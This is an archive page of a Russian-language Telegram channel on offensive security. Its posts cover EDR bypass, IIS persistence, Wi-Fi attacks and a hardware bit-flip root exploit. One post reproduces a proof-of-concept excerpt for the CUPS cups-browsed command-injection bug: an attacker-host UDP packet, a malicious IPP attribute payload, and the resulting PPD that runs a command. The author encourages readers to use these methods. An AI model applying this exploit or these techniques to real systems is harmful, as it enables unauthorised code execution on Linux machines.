en
Feedback
AD_POHEQUE

AD_POHEQUE

Open in Telegram

Будь тем, чем другие не были.

Show more
1 064
Subscribers
No data24 hours
+47 days
+430 days
Posts Archive
Этот год был непростым для многих из нас. Для кого-то он стал временем серьёзных испытаний, а для кого-то даже потрясений. Я знаю это по собственному опыту. Но если мы смогли пройти через это, значит, мы справились. Мы выдержали. А это уже немало. Теперь мы знаем, что способны на большее. Пусть Господь и дальше будет на нашей стороне в новом году. И давайте двигаться вперёд — без иллюзий, с ясным пониманием ситуации и готовностью брать своё. Стремитесь к свету, оставайтесь на стороне справедливости и помните: сила в правде. Берегите себя и своих близких. С Новым годом! 👾

За этот год я насмотрелся на настоящий цирк в ИБ. Специалисты клепают отчёты ради kpi, пока их инфраструктура гниёт, бюджеты летят на «сертифицированные» СЗИ, которые защищают разве что от здравого смысла. Найм в IT превратился в анекдот: берут кого попало, главное — чтобы покладистый. И девиз у них подходящий: «Коллеги, у нас много работы, думать некогда — надо работать!». Как писал Фейербах:
«Высшая степень иллюзорности представляет для них высшую степень святости».
После эфира со Skillbox я написал статью, где разложили всё по фактам. Без прикрас, маркетингового мусора и сказок про волшебные таблетки. Это про то, как построить минимальную, но работающую защиту, а не раздувать бюджеты ради видимости. Что в статье:  - Как не закопать деньги в бесполезные подписки.  - Как собрать инфраструктуру, которая держит удар.  - Как настроить процессы, которые не развалятся при первом запуске Nmap.  Если вы хотите разобраться, как на практике выстроить процессы ИБ, при этом не попасть в клуб papersec'ов и прочих "воинов бумажных", — эта статья для вас. 👾 https://skillbox.ru/media/code/kak-postroit-bezopasnuyu-sistemu-dlya-it-proekta-layfhaki-ot-belogo-hakera/

Презентация с которой я выступал на митапе 25.10.25 в Bi.Zone. Разобрал два эффективных подхода для исполнения кода в обход E
Презентация с которой я выступал на митапе 25.10.25 в Bi.Zone. Разобрал два эффективных подхода для исполнения кода в обход EDR предложенные Фабианом Мошем и Маркусом Хатчинзом. Эти парни и их исследования часто выручали меня на реальных проектах, считаю их спонсорами моих компетенций. Актуальности они не потеряли, пользуйтесь. 👾Подпишись👾

Есть такая конторка под названием Vulnerability Information and Coordination Environment, или просто VINCE. Работают под патр
Есть такая конторка под названием Vulnerability Information and Coordination Environment, или просто VINCE. Работают под патронажем американской Cybersecurity & Infrastructure Security Agency, сокращённо киса CISA. Всё серьёзно: кибербезопасность от самых "безопасных" безопасников. Инфосеки лютые. Но самое интересное: им можно сдавать баги. А потом удобно усесться, с чашечкой чая, и наблюдать, как нераскрытые отчеты по уязвимостям внезапно оказываются на breachforums. Вот такой вот "координационный" подход. 😂 А теперь про саму уязвимость. Если вкратце, исследователь обнаружил что у него по 0.0.0.0 вещает UDP порт 631, после того как поставил Ubuntu на свой компьютер. Немного погулив, он выяснил, что это сервис cups-browsed, который является частью системы CUPS, и он отвечает за обнаружение новых принтеров и их автоматическое добавление в систему. Linux просто добавляет все найденное в сети, прежде чем пользователь сможет это подтвердить или хотя бы получить уведомление. 😱 Выдержка из PoC. Шаг 1: Атакующий запускает вредоносный IPP-сервер, а затем отправляет первый UDP-пакет на целевую машину по порту 631:
0 3 http://<IP-АТАКУЮЩЕГО>:<ПОРТ>/printers/whatever
Это заставит целевую машину подключиться обратно к серверу IPP, находящемуся под контролем атакующего, и раскрыть версию ядра и CUPS в заголовке User-Agent. Шаг 2: Это заставляет жертву подключиться к IPP-серверу атакующего и запросить его атрибуты. Сервер отвечает списком допустимых атрибутов, включая последний атрибут, используемый для инъекции команд в ОС:
# ... другие допустимые атрибуты ...
(
    SectionEnum.printer,
    b'printer-privacy-policy-uri',
    TagEnum.uri
): [b'https://www.google.com/"\n*FoomaticRIPCommandLine: "' +
    self.command.encode() +
    b'"\n*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip'],
Это приведет к: - Инъекции пользовательских PPD-директив (с двойной кавычкой и новой строкой) в временный PPD-файл. (Баг: строки из атрибутов должны экранироваться) - Обходу этих проверок. (Баг: пробел, добавленный перед двоеточием, позволяет обойти проверки на основе strncmp) В результате получим следующий PPD:
...
*cupsSNMPSupplies: False
*cupsLanguages: "en"
*cupsPrivacyURI: "https://www.google.com/"
*FoomaticRIPCommandLine: "echo 1 > /tmp/I_AM_VULNERABLE"
*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip"
*cupsSingleFile: True
*cupsFilter2: "application/vnd.cups-pdf application/pdf 0 -"
...
Этот PPD приведет к выполнению команды echo 1 > /tmp/I_AM_VULNERABLE на целевой машине при отправке задания на печать на поддельный принтер. 🫡 👾Подпишись👾

Стоит расширять свои компетенции, хоть я и с большой любовь отношусь к продуктам от Windows и их подходу к безопасной разработке 😄 Не так давно читал на хабре статью о безопасности FreeIPA от Всеволода Саломадина из R-Vision. https://habr.com/ru/companies/rvision/articles/825086/ Пару часов назад на ютубе опубликовали доклад на эту тему от автора статьи. https://youtu.be/oLGcuta4R-8 Всем приятного просмотра 🍿 PS: Базовые концепции также описаны в статье на хактриксе, плюс внизу ссылки на цикл статей от SpecterOps, которые определенно будут интересны специалистам по наступательной безопасности. https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting 👾ЖМИ СПЕЙСИНВЕЙДЕРА👾

😄Ловите новый гайд по закреплению на IIS-серверах через PSWA (PowerShell Web Access). Как злоупотребить легитимным функционалом и превратить его в свою точку опоры. Примеры команд, коротко и по делу. Подписывайся на @ad_poheque, чтобы быть в курсе актуальных методов взлома! 👾 👾 ЖМИ СПЕЙСИНВЕЙДЕРА 👾

🚀 Прикури от root'а: как взломать Linux с помощью зажигалки Бомбовый материал от David'а Buchanan'а — атака с использованием обычной зажигалки для bit-flip'а в памяти! 📲🔥 Исследователь показал, как с помощью электромагнитных импульсов, создаваемых пьезоэлектрическим воспламенителем зажигали, можно вызвать аппаратные сбои в памяти, получить произвольный доступ к данным и поднять привилегии до root на Linux. Суть эксплойта: - Припаиваем антенну к шине DDR3 💻 - Щелкаем зажигалкой 🔥 - Ловим переворот бита 🎯 - Эксплуатируем CPython, создавая примитив для чтения/записи в памяти 📜 - Загружаем shell-код и получаем root 🏴‍☠️ 💥 Эта статья замечательная демонстрация того, как изящно можно использовать физические уязвимости для реальных атак. Полный разбор + код здесь: [PoC] [Оригинальная статья] Берите на вооружение ;) Спейсинвейдера жми 👾

+1
wireless_ad_poheque.md0.27 KB

Ломаем Wi-Fi с клиентами и без, грабим клиентов WPA*-Enterprise на доменные пароли в открытом виде. Шпаргалка представляет собой чёткую инструкцию по атакам на сети Wi-Fi. Описаны ключевые команды для мониторинга, перехвата рукопожатий, взлома сетей WPA2-Personal и атак на клиентов WPA2-Enterprise. Для тех, кто хочет освоить базовые навыки пентестера и ломать корпоративные сети покуривая сигаретки около офиса Заказчика или попивать чай в кафе где обычно обедает его персонал. Предложены методы для атак на клиентов через захват PMKID и рукопожатий, а также более сложные сценарии атак типа Evil Twin и MANA. Это руководство поможет раздобыть учетные записи, хэши и иногда пароли в открытом виде без привлечения внимания клиентов и получить серьезные аргументы для дальнейших атак на целевые корпоративные сети. Особое внимание уделено использованию eaphammer для эффективного выполнения атак на WPA2-Enterprise и проведения атак методом социальной инженерии через captive portal. Да, она старая, но актуальности не потеряла. Часто выручала на проектах. Спейс инведера жми. 👾

можно еще и на книжках сэкономить 500 рублей.
можно еще и на книжках сэкономить 500 рублей.

это напоминание для себя многое пройдено, большее ещё предстоит впереди может и тебе пригодится 👾

Пашка, держись!

🤡

photo content

Repost from vx-underground
Happy Supply Chain Attack Friday! tldr if you updated Kali Linux recently you're pwned with malware https://twitter.com/kalilinux/status/1773786266074513523

Нет повести печальнее на свете, чем на бича зарегистрированный киви-кошелек. 👾

Давно сюда ничего не постил, но тут наткнулся на интересный килчейн построенный на тривиальных техниках. Посты будут. Позже.
Давно сюда ничего не постил, но тут наткнулся на интересный килчейн построенный на тривиальных техниках. Посты будут. Позже. Работы валом и вам того желаю. Спейс инвейдера жмём. 👾